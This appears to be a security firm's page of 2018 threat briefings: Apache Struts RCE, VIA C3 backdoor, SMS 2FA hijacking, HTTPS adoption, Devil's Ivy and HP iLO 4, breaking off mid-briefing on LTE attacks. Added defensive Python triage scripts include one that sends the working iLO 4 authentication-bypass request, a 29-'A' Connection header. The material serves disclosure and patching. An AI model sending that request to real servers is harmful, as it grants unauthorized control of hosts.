The popular, actionable and insightful piece, “12 Things I Learned the Hard Way about Being a Project Manager in Infosec,” by InGuardians’ Director of Operations Suzanne Pereira, contains lessons and reminders on how to manage projects by focusing on people, communication and advocacy. Read more:  https://www.linkedin.com/pulse/12-things-i-learned-hard-way-being-project-manager-infosec-pereira/

Jay Beale, InGuardians Founder and CTO, will be speaking this weekend at ToorCon in San Diego.  His talk, “Hacking and Hardening Kubernetes” focuses on exploiting the technology’s weaknesses and then using its features to lock it down.  Track: Seminars, When: 9.14.18 at 16:00 PST. For more information: https://sandiego.toorcon.net/

InGuardians is sponsoring Idaho Falls’ first BSides event this weekend.  Stop by our booth and chat with our Head of Offensive Services and Idaho local, Tyler Robinson.  For more information: https://infosec-conferences.com/events-in-2018/bsides-idaho-falls/

08/28/2018 Apache Struts 2 RCE Vulnerability Affects Many Web Apps, including products from Aruba Networks, Cisco Systems, and NetApp

Issue
Last week, the Apache Struts team publicly announced a severe remote code execution vulnerability in Apache Struts 2 (CVE-2018-11776). Like the Strutshock vulnerability used in the 2017 Equifax breach, this flaw allows an attacker to run programs of their choice on the server hosting a web application that uses certain configurations or functionality. The 2017 Equifax breach is considered by many to be the worst corporate breach in US history: bad actors stole personal information, including Social Security numbers, belonging to 147 million people in the US, roughly 58% of the US adult population. This vulnerability is present in Apache Struts versions 2.3 through 2.3.34 and 2.5 through 2.5.16.

Applications are vulnerable when the alwaysSelectFullNamespace setting is true (set explicitly, or by a plugin such as the Convention plugin) and they either:

1) use results with no namespace of their own, where the enclosing package or action has no namespace or a wildcard namespace; or
2) use a url tag with no value and action set, again where the enclosing package has no namespace or a wildcard namespace.

Many vendors’ products, in addition to organizations’ internally developed applications, use Apache Struts 2, as detailed in the next section.
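A triage script for the two conditions above and the affected version ranges, as an added example that is not code from the briefing, the Apache Struts project or Semmle. The struts.xml it scans is constructed for the example; the set of result types treated as namespace-aware (chain, redirectAction, postback) is an assumption covering the common risky shapes, not a complete list; and the XML check is a heuristic that does not evaluate the alwaysSelectFullNamespace runtime setting, so a hit means “review this”, not “exploitable”.

```python
"""Triage an Apache Struts 2 deployment for CVE-2018-11776 (S2-057) exposure.

Added example; not code from the briefing, the Apache Struts project or
Semmle. Two checks mirror the advisory's conditions:
  1. version: Struts 2.3 through 2.3.34 and 2.5 through 2.5.16 are affected
  2. configuration: struts.xml packages whose namespace is missing or a
     wildcard, containing results that hand off to another action without
     a namespace of their own
The result types treated as namespace-aware below are an assumption
covering the common risky shapes; the XML check is a heuristic that does
not evaluate alwaysSelectFullNamespace, so treat a hit as "review this".
The struts.xml is constructed for the example.
"""
import xml.etree.ElementTree as ET
from typing import List, Tuple

AFFECTED_RANGES = (((2, 3, 0), (2, 3, 34)), ((2, 5, 0), (2, 5, 16)))
NAMESPACE_AWARE_RESULTS = {"chain", "redirectAction", "postback"}  # assumption


def parse_version(v: str) -> Tuple[int, ...]:
    """'2.5' -> (2, 5, 0); '2.3.34' -> (2, 3, 34)."""
    parts = tuple(int(p) for p in v.strip().split("."))
    return parts + (0,) * (3 - len(parts))


def version_affected(v: str) -> bool:
    """True if the Struts 2 version string falls inside an affected range."""
    pv = parse_version(v)
    return any(lo <= pv <= hi for lo, hi in AFFECTED_RANGES)


def find_risky_results(struts_xml: str) -> List[str]:
    """Return 'package/action/result' paths that match the risky shape."""
    hits: List[str] = []
    for pkg in ET.fromstring(struts_xml).iter("package"):
        ns = pkg.get("namespace")
        if ns is not None and "*" not in ns:
            continue                      # fixed package namespace: not the risky shape
        for action in pkg.iter("action"):
            for result in action.iter("result"):
                if result.get("type", "dispatcher") not in NAMESPACE_AWARE_RESULTS:
                    continue              # e.g. a plain JSP dispatcher result
                params = {p.get("name"): (p.text or "").strip() for p in result.iter("param")}
                if not params.get("namespace"):
                    hits.append(f"{pkg.get('name')}/{action.get('name')}/{result.get('name', 'success')}")
    return hits


# Constructed struts.xml exercising each shape (not from any real application).
SAMPLE_STRUTS_XML = """<struts>
  <package name="legacy" extends="struts-default">
    <action name="login" class="app.Login">
      <result name="success" type="redirectAction">home</result>
    </action>
  </package>
  <package name="wild" namespace="/*" extends="struts-default">
    <action name="view" class="app.View">
      <result name="success" type="chain">render</result>
      <result name="error">/error.jsp</result>
    </action>
  </package>
  <package name="safe" namespace="/app" extends="struts-default">
    <action name="index" class="app.Index">
      <result name="success" type="redirectAction">home</result>
    </action>
  </package>
  <package name="explicit" extends="struts-default">
    <action name="go" class="app.Go">
      <result name="success" type="redirectAction">
        <param name="actionName">home</param>
        <param name="namespace">/app</param>
      </result>
    </action>
  </package>
</struts>"""


if __name__ == "__main__":
    for v in ("2.3.34", "2.3.35", "2.5.16", "2.5.17"):
        print(v, "affected" if version_affected(v) else "fixed")
    print("risky results:", find_risky_results(SAMPLE_STRUTS_XML))
```

Run it against each application’s real struts.xml (and the Struts jar version in WEB-INF/lib); the two flagged entries in the sample are the shapes the advisory describes, while the “safe” and “explicit” packages show the two ways a configuration escapes them.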

Impact
Many web applications and product web front ends are potentially vulnerable. Because Apache Struts 2 is a “middleware” web application framework, organizations may not realize they have web applications built on it.  Several vendors have already determined that their products are vulnerable, including Aruba Networks, whose announcement covers its ClearPass servers; Cisco Systems, which announced four vulnerable products; and NetApp, which announced 82 vulnerable products.

Vulnerable products and web applications allow an attacker full remote control of the host. This can lead to organizational compromise, ransomware, or crypto-mining activity, whether on a small scale or through automated worms.

Recommendations
As this vulnerability was discovered in April, with some likelihood of independent discovery or leak before patches became available four months later in August, it is especially important to correct vulnerable applications quickly. Staff can correct the flaw by upgrading the Apache Struts 2 framework to version 2.3.35 or 2.5.17. If the vulnerable application is provided by a vendor, InGuardians recommends seeking out the vendor’s advisory for corrective action.

Additional Resources
Apache Struts Security Bulletin

“Semmle Discovers Critical Remote Code Execution Vulnerability in Apache Struts (CVE-2018-11776)” (Semmle Blog)
https://semmle.com/news/apache-struts-CVE-2018-11776

Aruba Networks ClearPass Policy Manager Security Advisory ARUBA-PSA-2018-005
https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2018-005.txt

Apache Struts Remote Code Execution Vulnerability Affecting Cisco Products: August 2018
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts#vulnerable

NetApp Security Advisory NTAP-20180822-0001
https://security.netapp.com/advisory/ntap-20180822-0001/

Three Public Exploits Posted
https://github.com/rapid7/metasploit-framework/issues/10524

Nessus Plugin 112064 (Checks for Vulnerability)
https://www.tenable.com/plugins/nessus/112064

CVE 2018-11776
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776

08/20/2018 VIA C3 CPUs Allow Unauthenticated Code Execution

Issue
VIA C3 CPUs allow unauthenticated code execution, granting an attacker elevated privileges.  A new tool named project:rosenbridge exploits a backdoor in VIA C3 CPUs.  C3 chips are found primarily in embedded x86 devices such as point-of-sale machines, automated teller machines (ATMs), healthcare hardware, and industrial automation devices, plus a limited number of desktops and laptops.  The backdoor is a small non-x86 core embedded alongside the main x86 core.  Activating it should require kernel-level privilege, since it is switched on through a model-specific register; the researchers discovered that on some systems it is enabled by default.  Thus far, neither the researchers nor VIA have named which devices shipped with the backdoor enabled.  Where it is enabled, any unprivileged code can use the hidden core to bypass memory protections and modify the operating system kernel.

Impact
The impact of this exposure is high: it is a privilege escalation from any unprivileged code directly into the kernel, for which there are currently no patches and few workarounds.  Exposure of healthcare devices, ATMs, and industrial automation devices should be taken very seriously.

Recommendations
InGuardians recommends that your organization inventory its deployed hardware to determine which machines carry a VIA C3.  Once that investigation is complete, enumerate the Windows Active Directory machine accounts corresponding to the affected devices; each of those accounts must have a strong password.  The affected machines must be segregated from the enterprise network with strong network access control. If segregation is not possible, permit access to the devices on a case-by-case, whitelist basis until a patch is released or the devices reach the end of their life cycle.

Additional Resources

VIA C3 processors (VIA Manufacturer Product Page)
https://www.viatech.com/en/silicon/legacy/processors/c3/

Project:rosenbridge (GitHub project page, Christopher Domas)
https://github.com/xoreaxeaxeax/rosenbridge

08/14/2018 Princeton researchers warn home IoT devices could cause serious issues for utilities
Issue
This week, a team of researchers from Princeton University is presenting its research on home Internet of Things (IoT) devices at the USENIX Security Symposium in Baltimore, MD.  They used the grid simulation packages MATPOWER and PowerWorld to determine how many devices, each drawing how much power, would be required to damage a power grid, basing their model on a small Polish grid from 2008.  They found that they could trigger a “cascading blackout” of 86% of the grid by suddenly and unexpectedly increasing demand by only 1%, an increase achievable with a botnet of as few as 42,000 compromised IoT water heaters.
Impact
This research has only just left the lab, and there is no current indication of a botnet made up of compromised water heaters.  However, given the history of IoT botnets and their impact, such as the Mirai botnet in October 2016, it should be treated as an early warning.  Refrigerators, DVRs, smart TVs, and a host of other home IoT devices have previously been conscripted into malicious botnets of hundreds of thousands of devices that caused network outages through distributed denial of service (DDoS) attacks.

Utility companies employ experts who forecast demand and schedule generation accordingly.  An attack on the demand side of that equation, involving large home appliances such as water heaters and air conditioners, could hit without warning.
Recommendations
For the consumer, vigilance and isolation of home IoT devices are key.  Identify the IoT devices on your networks and put controls and audit measures in place to prevent and detect abuse.  While there are standards for devices deployed by utility companies, such as smart meters, there are currently no secure deployment standards for devices installed by the homeowner.  InGuardians believes such a standard should be created and a working group assembled to ensure that the risk of these home IoT devices is mitigated.

Additional Resources
“A Quick History of IoT Botnets” (Radware)
https://blog.radware.com/uncategorized/2018/03/history-of-iot-botnets/

“Mirai (Malware) [Botnet]” (Wikipedia)
https://en.wikipedia.org/wiki/Mirai_(malware)

“How Hacked Water Heaters Could Trigger Mass Blackouts” (Wired)
https://www.wired.com/story/water-heaters-power-grid-hack-blackout/
08/08/2018 Reddit Hack Reveals Flaws in SMS Based Two-Factor Authentication

Issue
On August 1, the popular community site Reddit revealed that an attacker had gained access to several employee accounts, cloud infrastructure, and source code between June 14 and June 18; Reddit discovered the intrusion on June 19.  The access was read-only: the attacker was unable to modify website content or user data.  Data accessed included a database backup from 2005 to 2007, containing account credentials (with salted and hashed passwords) and email addresses, and email digests (which link email addresses to account names).

The manner in which the attacker gained access to Reddit’s systems is more troubling than this particular data.  All of the compromised employee accounts had Two Factor Authentication (2FA) enabled, and in each case the second factor was a PIN delivered via SMS to a mobile device.  While 2FA is normally enough to protect such accounts, delivery of PINs via SMS can be compromised in at least two ways.  We do not know the specific method the attacker employed here, but the likely attack vectors are:

  1. Creation of a rogue cellular tower signal, in order to lure the victim’s mobile devices.  Once connected to the rogue tower, the attacker could perform cellular traffic interception, acting as Man in the Middle (MiTM), ultimately allowing for the recovery of the SMS based PINs for the affected users.
  2. Social engineering the cellular provider customer support call center in order to port the victim’s phone number to a device under the control of the attacker.  This effectively delivers the SMS based PINs directly to the attacker.

While speculative, the level of effort for the two scenarios makes it most likely that number porting was used here.  InGuardians operators have recently seen similar number-porting attacks, though usually aimed at recovering cryptocurrency account credentials.

Impact
With a successful compromise of a user’s 2FA delivery method, through either number porting or a rogue cellular tower, an attacker can gain unfettered access to the victim’s network, applications, and other credentials. As the Reddit example shows, the outcome can be severe, up to complete compromise of the organization.

While standing up a rogue cellular tower is non-trivial, number porting is the more likely vector.  It takes little more than the nerve to social-engineer a carrier’s support desk, which is a low barrier indeed.

Recommendations
As a result of high-profile attacks against 2FA that relies on SMS PIN delivery, organizations should carefully review and revise their 2FA implementations.  At this time InGuardians recommends moving away from SMS-based 2FA to hardware or software tokens, in addition to passwords.

For those organizations looking to start 2FA implementations for either their users or customers, it is recommended to avoid the option of SMS based delivery and move right to hardware or software token based authentication, in addition to passwords.

While the adoption of hardware and software based tokens can be more expensive, and more obtrusive for the end user, the overall gain in security is much greater.

Additional Resources
Reddit: We had a security incident. Here’s what you need to know.
https://www.reddit.com/r/announcements/comments/93qnm5/we_had_a_security_incident_heres_what_you_need_to/

Reddit hack shows even strong security measures can be bypassed
https://www.cnbc.com/2018/08/01/reddit-hack-shows-even-strong-security-measures-can-be-bypassed.html

07/30/2018 Browsers Begin Marking Unencrypted Sites as “Not Secure”

Issue
The lack of HTTPS on a website has slowly become a sign that the company hosting a web application does not understand the impact of unencrypted traffic on its users. As a result, browser vendors have adopted increasingly conspicuous ways to alert users to the basic risks of unencrypted websites. They have long warned users that entering credentials into an unencrypted page is dangerous. Last week, Google released Chrome 68, which marks all unencrypted sites as “Not Secure” in the address bar. Mozilla added a similar (albeit manually activated) feature in 2017 and may soon make it standard. Microsoft and Apple may follow suit.

Most criticism of unencrypted websites describes the risk of some nefarious group reading the web traffic or stealing passwords, but properly configured HTTPS offers much more than those protections. Users of a properly configured HTTPS website can be sure of three things:

  • Authentication: The content is provided by the entity they expect.
  • Integrity: The content has not been modified between the server and the browser.
  • Confidentiality: The content is safe from decryption by third parties.

The risk the first two points pose is not theoretical. Numerous countries route all web traffic through a single national proxy. University of Toronto researchers found that one of these national proxies added cryptocurrency mining code to unencrypted websites. Citizens and tourists alike executed this code.

The same report identified two other countries adding state-sponsored malware to unencrypted downloads. This places a company’s customers and traveling personnel (and ultimately the enterprise environment) at risk. Those who notice will point to the company as the culprit, suggesting that it was compromised since the malicious code appeared to come from its site.

Even some US internet service providers (ISPs) have injected content on unrelated sites, and some may still do so. ISPs Verizon, Comcast, and CMA Communications have all been previously identified as modifying traffic passing through their networks.

Impact
Ultimately, HTTPS sites will lose the green “Secure” indicator as browsers come to treat encryption as the norm, and the current “Not Secure” text could change to something more ominous. Within hours of the release, some prominent retailers had already switched to HTTPS by default to avoid the potential trust issues. This had likely been planned for some time (enabling HTTPS is often not trivial), but it demonstrates how seriously many companies take the change.

Recommendations
InGuardians recommends that all companies protect their websites and services with a properly-issued HTTPS certificate and updated encryption settings, including mandatory HTTPS. These measures protect your clients, employees, and other users not only from a threat agent obtaining information but also from modifying it in ways that may not be easily detected.

Deployment of HTTPS has become much easier and less expensive, as certificate authorities (CAs) have adopted new models to promote its use. Let’s Encrypt offers free certificates, and some certificate vendors offer wildcard certificates that can be used on an unlimited number of systems.
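A posture check for the “mandatory HTTPS” part of the recommendation, as an added example that is not code from the briefing, Qualys or Let’s Encrypt. A certificate alone does not make HTTPS mandatory: cleartext requests have to be permanently redirected, and a Strict-Transport-Security (HSTS) header with a long max-age is what stops a browser from ever going back to http://. The HTTP layer is injected so the check runs offline; the host names and headers are made up for the example, and fake_fetch stands in for a real client that does not follow redirects.

```python
"""Check that a host actually enforces HTTPS, using constructed responses.

Added example; not code from the briefing or from any of the tools linked
below. "Mandatory HTTPS" is more than owning a certificate: plain http://
requests must be permanently redirected to https://, and the HTTPS
response should carry a Strict-Transport-Security (HSTS) header with a
long max-age so browsers refuse to fall back to cleartext. The HTTP layer
is injected so the check runs offline; the host names and headers below
are made up for the example, and fake_fetch stands in for a real client.
"""
from typing import Callable, Dict, List, Tuple

# fetch(url) -> (status, headers) with header names lower-cased
Fetch = Callable[[str], Tuple[int, Dict[str, str]]]

SIX_MONTHS = 15552000   # seconds; a common minimum for a meaningful HSTS policy


def parse_hsts(value: str) -> Dict[str, str]:
    """'max-age=31536000; includeSubDomains; preload' -> directive dict."""
    out: Dict[str, str] = {}
    for directive in value.split(";"):
        directive = directive.strip()
        if directive:
            name, _, val = directive.partition("=")
            out[name.strip().lower()] = val.strip()
    return out


def evaluate_https_posture(fetch: Fetch, host: str) -> List[str]:
    """Return a list of findings; an empty list means the host passes."""
    findings: List[str] = []

    # 1. cleartext must be redirected, permanently, to the same host over TLS
    status, headers = fetch(f"http://{host}/")
    location = headers.get("location", "")
    if status not in (301, 308) or not location.startswith(f"https://{host}"):
        findings.append("http:// is not permanently redirected to https://")

    # 2. the TLS side must answer and must pin browsers to HTTPS via HSTS
    status, headers = fetch(f"https://{host}/")
    if status != 200:
        findings.append(f"https:// returned {status}")
    hsts = headers.get("strict-transport-security")
    if hsts is None:
        findings.append("no Strict-Transport-Security header")
    else:
        directives = parse_hsts(hsts)
        try:
            max_age = int(directives.get("max-age", "0"))
        except ValueError:
            max_age = 0
        if max_age < SIX_MONTHS:
            findings.append(f"HSTS max-age {max_age} is shorter than six months")
        if "includesubdomains" not in directives:
            findings.append("HSTS does not cover subdomains")
    return findings


# --- constructed responses (not captured from real sites) ---
SAMPLES = {
    "http://good.example/":  (301, {"location": "https://good.example/"}),
    "https://good.example/": (200, {"strict-transport-security": "max-age=31536000; includeSubDomains"}),
    "http://weak.example/":  (200, {"content-type": "text/html"}),      # still serves cleartext
    "https://weak.example/": (200, {"strict-transport-security": "max-age=300"}),
}


def fake_fetch(url: str) -> Tuple[int, Dict[str, str]]:
    """Offline stand-in for an HTTP GET that follows no redirects."""
    return SAMPLES.get(url, (404, {}))


if __name__ == "__main__":
    for host in ("good.example", "weak.example"):
        print(host, evaluate_https_posture(fake_fetch, host) or ["ok"])
```

Pair this with the Qualys SSL Labs test linked below for the cipher and protocol side; the script only covers what a scanner of the certificate alone will not tell you, namely whether a user who types the bare host name ever reaches the encrypted site.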

Additional Resources
Google Chrome 68 Release Notes (Jul 24, 2018)
https://support.google.com/chrome/a/answer/7679408?hl=en#68

BAD TRAFFIC: Sandvine’s PacketLogic Devices Used to Deploy Government Spyware in Turkey and Redirect Egyptian Users to Affiliate Ads? (Mar 9, 2018)
https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/

Verizon’s “supercookies” violated net neutrality transparency rule (Mar 7, 2016)
https://arstechnica.com/information-technology/2016/03/verizons-supercookies-violated-net-neutrality-transparency-rule/

Comcast Wi-Fi serving self-promotional ads via JavaScript injection (Sept 8, 2014)
https://arstechnica.com/tech-policy/2014/09/why-comcasts-javascript-ad-injections-threaten-security-net-neutrality/

Comcast is still forcing pop-up ads on customers to upsell its modems (Dec 11, 2017)
https://www.dailydot.com/debug/comcast-browser-pop-up/

How a banner ad for H&R Block appeared on apple.com—without Apple’s OK (Apr 7, 2013)
https://arstechnica.com/tech-policy/2013/04/how-a-banner-ad-for-hs-ok/

Qualys SSL Labs Server Test
https://www.ssllabs.com/ssltest/

Cipherli.st Strong Ciphers for Apache, nginx, and Lighttpd
https://cipherli.st/

Let’s Encrypt: Free Certificates
https://letsencrypt.org

07/25/2018 “Devil’s Ivy” Flaw Renders Millions of Internet of Things (IoT) Devices Vulnerable

Issue
An integer overflow in a library used by security cameras and many other Internet of Things (IoT) devices has been discovered and disclosed by security researchers at Senrio.  The Senrio researchers demonstrated the exploit against a single AXIS security camera, but the vulnerable library, gSOAP by Genivia, is used by many IoT device manufacturers; it is present in 249 distinct Axis camera models alone.

Impact
The impact of this vulnerability is likely to grow in the coming weeks, as proof-of-concept exploits surface and additional vulnerable targets are identified.  Almost one year ago, insecure IoT devices, chiefly cameras and DVRs still using default credentials, let the Mirai botnet take hold.  At its peak, Mirai controlled more than 600,000 IoT devices and launched distributed denial of service (DDoS) attacks in excess of 1.1 terabits per second, slowing or stopping Internet access for much of the eastern United States for part of a day.  At this time, at least thirteen (13) variants of Mirai are active on the Internet.

While the Devil’s Ivy flaw has not yet resulted in a Mirai-style botnet, the announcement of the vulnerability gives us pause to think of the wide ranging consequences of vulnerabilities in widely-deployed devices.  Now is the time to identify the products using the gSOAP library, and check your networks for vulnerable devices.

Recommendations
At the time of this briefing, Axis Communications has not issued a patch for CVE-2017-9765.  Their main recommendation, which InGuardians will echo, is to restrict network access to and from the devices.

Network segmentation, along with controls and audit measures, are the first line of defense here.  This is a remote execution flaw that requires no authentication or credentials, merely network access.

Often, IoT devices are ignored by organizations’ security operations teams because the devices are either externally managed or simply not managed at all.  It is imperative to identify the systems you have in place and to spell out ownership and maintenance in an IT governance plan.

IoT security differs in some aspects from traditional IT security as many of these devices provide little in the way of configuration and management.  InGuardians recommends adding IoT devices to your asset inventory, and including them in regular maintenance, and security audits.

Additional Resources
Devil’s Ivy: Flaw in Widely Used Third-party Code Impacts Millions (Senrio, July 18, 2017)
https://blog.senr.io/blog/devils-ivy-flaw-in-widely-used-third-party-code-impacts-millions

Axis Communications Security Advisory for Devil’s Ivy
https://www.axis.com/files/faq/Advisory_ACV-128401.pdf

Genivia advisory for Devil’s Ivy Vulnerability in gSOAP:
https://www.genivia.com/advisory.html#Security_advisory:_CVE-2017-9765_bug_in_certain_versions_of_gSOAP_2.7_up_to_2.8.47_%28June_21,_2017%29

CVE Advisory for Devil’s Ivy:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9765

“Devil’s Ivy” Vulnerability Could Afflict Millions of IoT Devices (Wired, July 18, 2017)
https://www.wired.com/story/devils-ivy-iot-vulnerability/

How a Dorm Room Minecraft Scam [Mirai] Brought Down the Internet (Wired, December 13, 2017)
https://www.wired.com/story/mirai-botnet-minecraft-scam-brought-down-the-internet/

Wikipedia Article on Mirai
https://en.wikipedia.org/wiki/Mirai_(malware)

07/16/2018 HP iLO 4: Simple Authentication bypass can lead to system compromise.

Issue
In August of 2017, Hewlett Packard Enterprise (HPE) quietly patched an authentication bypass vulnerability (CVE-2017-12542) in its proprietary Integrated Lights-Out (iLO) version 4.  iLO runs on a dedicated baseboard management controller in higher-end HP servers, enabling remote management even when the operating system itself cannot function.  The vulnerability, present in iLO 4 firmware prior to 2.53, is particularly concerning because of the criticality of the systems many organizations manage with iLO 4, which include Windows Active Directory domain controllers.

This authentication bypass is over a year old and received a CVSS score of 9.8 (out of 10) on release.  However, it appears that many organizations have NOT patched their systems.  More recently, the researchers who discovered the flaw have been presenting it publicly, and disclosed that a single HTTP request to the iLO 4 web interface whose Connection header consists of 29 “A” characters bypasses authentication entirely.  This simple attack grants full access to the iLO 4 subsystem and therefore total control of the host: the attacker can access the system console as the active user, mount virtual media (such as a bootable penetration-testing Linux distribution), and reboot the host.

Recently, InGuardians operators have leveraged the HP iLO 4 authentication bypass in exactly this way to gain full control of Active Directory where certain conditions were met.  While the flaw is simple to exploit with tools such as curl under Linux, several other PoC releases and a Metasploit module are also available.

HP iLO 3 and iLO 5 are not affected, nor are iLO 4 firmware versions 2.53 and later.
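A triage script for the bypass described above, as an added example that is not code from the briefing, HPE, or the Airbus researchers. It reads the firmware version from /xmldata?item=all (which iLO serves without authentication), and only for firmware below 2.53 sends one GET with the 29-“A” Connection header to a resource that should demand a login. The XML and JSON bodies are constructed for the example, the BMC host names are made up, and the REST path is an assumption taken from the public write-up rather than something the briefing states; confirm it against your firmware before relying on the result.

```python
"""Triage HPE iLO 4 BMCs for the CVE-2017-12542 authentication bypass.

Added example; not code from the briefing, from HPE or from the Airbus
researchers. Two read-only steps:
  1. read the firmware version from /xmldata?item=all, which iLO serves
     without authentication, and compare it with the fixed release 2.53
  2. for an older version, send one GET to a REST resource that normally
     requires a login, with the Connection header set to 29 'A' characters
     (the bypass described above); a 200 carrying account data confirms
     the bypass, a 401 means the request was rejected as it should be
The HTTP layer is injected so this runs offline against constructed
responses. The XML and JSON bodies are made up for the example, and the
REST path is an assumption taken from the public write-up.
"""
import json
import re
from typing import Callable, Dict, Optional, Tuple

# fetch(url, extra_headers) -> (status, body)
Fetch = Callable[[str, Dict[str, str]], Tuple[int, str]]

FIXED_VERSION = (2, 53)              # iLO 4 firmware uses two-digit minors (2.50, 2.53, 2.55, ...)
BYPASS_HEADERS = {"Connection": "A" * 29}
PROBE_PATH = "/rest/v1/AccountService/Accounts"   # assumption, see lead-in


def ilo4_version(xmldata: str) -> Optional[Tuple[int, int]]:
    """Firmware version from /xmldata?item=all, or None if it is not iLO 4."""
    if "iLO 4" not in xmldata:
        return None                  # iLO 3, iLO 5 or not an iLO at all
    m = re.search(r"<FWRI>\s*(\d+)\.(\d+)\s*</FWRI>", xmldata)
    return (int(m.group(1)), int(m.group(2))) if m else None


def triage(fetch: Fetch, base: str) -> str:
    """Classify one BMC; base is e.g. https://10.0.0.5 with no trailing slash."""
    status, body = fetch(base + "/xmldata?item=all", {})
    ver = ilo4_version(body) if status == 200 else None
    if ver is None:
        return "not-ilo4-or-unknown"
    if ver >= FIXED_VERSION:
        return "patched"
    status, body = fetch(base + PROBE_PATH, BYPASS_HEADERS)
    if status == 200:
        try:
            items = json.loads(body).get("Items", [])
        except ValueError:
            items = []
        if items:
            return "bypass-confirmed"
    if status == 401:
        return "old-firmware-bypass-not-observed"
    return "old-firmware-inconclusive"


# --- constructed responses (not captured from real hardware) ---
XML_ILO4 = "<RIMP><MP><PN>Integrated Lights-Out 4 (iLO 4)</PN><FWRI>{v}</FWRI></MP></RIMP>"
XML_ILO3 = "<RIMP><MP><PN>Integrated Lights-Out 3 (iLO 3)</PN><FWRI>1.88</FWRI></MP></RIMP>"
ACCOUNTS_JSON = json.dumps({"Items": [{"UserName": "Administrator"}]})

SAMPLES = {
    "https://bmc-a.example/xmldata?item=all": (200, XML_ILO4.format(v="2.50")),
    "https://bmc-a.example" + PROBE_PATH:     (200, ACCOUNTS_JSON),    # bypass works
    "https://bmc-b.example/xmldata?item=all": (200, XML_ILO4.format(v="2.55")),
    "https://bmc-c.example/xmldata?item=all": (200, XML_ILO3),
    "https://bmc-d.example/xmldata?item=all": (200, XML_ILO4.format(v="2.50")),
    "https://bmc-d.example" + PROBE_PATH:     (401, "Unauthorized"),   # rejected as it should be
}


def fake_fetch(url: str, headers: Dict[str, str]) -> Tuple[int, str]:
    """Offline stand-in for an HTTPS GET; a probe without the crafted header needs a login."""
    if url.endswith(PROBE_PATH) and headers != BYPASS_HEADERS:
        return (401, "Unauthorized")
    return SAMPLES.get(url, (404, "Not Found"))


if __name__ == "__main__":
    for bmc in ("https://bmc-a.example", "https://bmc-b.example",
                "https://bmc-c.example", "https://bmc-d.example"):
        print(bmc, triage(fake_fetch, bmc))
```

Run it only against management networks you are authorized to test; the version step alone is enough to build the patch list, and the probe step is there to show the bypass really is as simple as the single header the researchers described.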

Impact
The impact of this vulnerability will differ based on an organization’s adoption, use cases, and policies for remote system management, especially its use of iLO 4.  Should a vulnerable version be in use, an attacker can gain full control of the organization’s computing infrastructure, depending on which services are hosted on the iLO 4-managed servers.  Where affected versions of iLO 4 manage lower-privilege systems, the flaw may merely provide an initial foothold, one that will likely lead to full compromise.

Recommendations
While remote management of systems is critical to effective IT operations, several things should be considered during its use to help protect the overall security of the environment:

  • PATCH: Add remote management solutions to the critical “short list” of systems monitored for, and given, patches.
  • Evaluate how many staff actually need to conduct remote management, and limit which systems can reach the remote management interfaces through robust network segmentation and firewalling, potentially including the use of well-secured jump hosts.
  • Limit what the remote management interfaces can reach in turn, especially for mounting remote file systems.  Allow remote file systems to be mounted only from trusted sources, again restricted by robust network segmentation and firewalling.
  • Establish a policy for remote access login sessions, specifically remote terminal (console) sessions.  Where privileged accounts can be left “logged in” indefinitely, an attacker who reaches that session gains all of the rights of the logged-in user.  Set short inactivity timeouts that automatically log out remote sessions.

Additional Resources
HP iLO4 vulnerability:
https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us

An authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53:
https://nvd.nist.gov/vuln/detail/CVE-2017-12542

Subverting your server through its BMC: the HPE iLO4 case [Fabien Périgaud, Alexandre Gazet, and Joffrey Czarny]:
https://airbus-seclab.github.io/ilo/SSTIC2018-Article-subverting_your_server_through_its_bmc_the_hpe_ilo4_case-gazet_perigaud_czarny.pdf

07/09/2018 Google confirms external apps can scan and allow their staff to read your emails.

Issue
Google continues to allow outside software developers to “scan the inboxes of millions of Gmail users who signed up for email-based services offering shopping price comparisons, automated travel-itinerary planners or other tools.” (see WSJ report link below)  Additionally, people who have connected third-party apps to their accounts may have unwittingly granted human staff permission to read messages those people considered private.

Impact
All reports available to date suggest this is a common practice and not limited to Google.  In June 2017, Google announced that it would allow users to opt out of its ad personalization via e-mail scanning.  It seems that the company is instead allowing third-party application developers to do so, both electronically (machine reading) and via human staff.  Google has made statements assuring that these developers are vetted, but remains silent about any subsequent verification of their process.

Many organizations as well as individuals rely on Gmail and similar provider managed email services. This suggests that anything discussed in such emails is potentially exposed to apps and to the developers of those apps. It raises significant questions about the security of email exchanges and highlights the need for organizational policy and practice to mitigate loss of intellectual property and exposure of confidential information.

While that is not new, this is a new vector for exposure.  Even if Google’s vetting is sound and developers adhere to reasonable security procedures, we know that data breaches of third parties are a common source of data exposure (see EXACTIS link below).  It also raises a question about possible exposure of ANY hosted services.  Reporting has limited discussion to Gmail and has been silent about whether or not G Suite “<person>@<company><dot>com” emails are in the mix.

Recommendations
Review written policies for all external email communication among employees and to clients to ensure they proscribe discussion of sensitive information. Remind staff to remain vigilant about discussing business dealings in emails.

Review written policies to confirm that employees are not permitted to send sensitive organization data via free/consumer-level Gmail or other third-party email providers.

Additional Resources
Wall Street Journal article and report:
https://www.wsj.com/articles/techs-dirty-secret-the-app-developers-sifting-through-your-gmail-1530544442 

ArsTechnica: Scroogled no more: Gmail won’t scan e-mails for ads personalization
https://arstechnica.com/gadgets/2017/06/gmail-will-no-longer-scan-e-mails-for-ad-personalization/

Business Insider article and discussion:
http://www.businessinsider.com/google-allows-app-developers-to-read-peoples-gmails-report-2018-7 

Wired (UK) news article:
http://www.wired.co.uk/article/gmail-security-checkup-apps-data
(article is apparently NOT on the US *.com website)

Wired article about EXACTIS breach:
https://www.wired.com/story/exactis-database-leak-340-million-records/ 

ABC (Australia) article with a good guide to checking apps:
http://www.abc.net.au/news/2018-07-04/google-admits-it-allows-external-apps-to-access-user-data/9938556 

07/02/2018 New attacks against LTE networks
Issue
Three new attack vectors in the LTE (aka 4G) standard have been unveiled by researchers from Ruhr-Universität Bochum and New York University Abu Dhabi.  These new vulnerabilities include two passive attacks that allow for identity mapping and website fingerprinting, and one active cryptographic attack called aLTEr.  The last would allow attackers to remotely redirect network connections via DNS spoofing.  The major issue with these new attack vectors is that the flaw is in the standard, which is ubiquitous in mobile communication, and therefore affects ALL devices using LTE.

There are three main attack vectors:
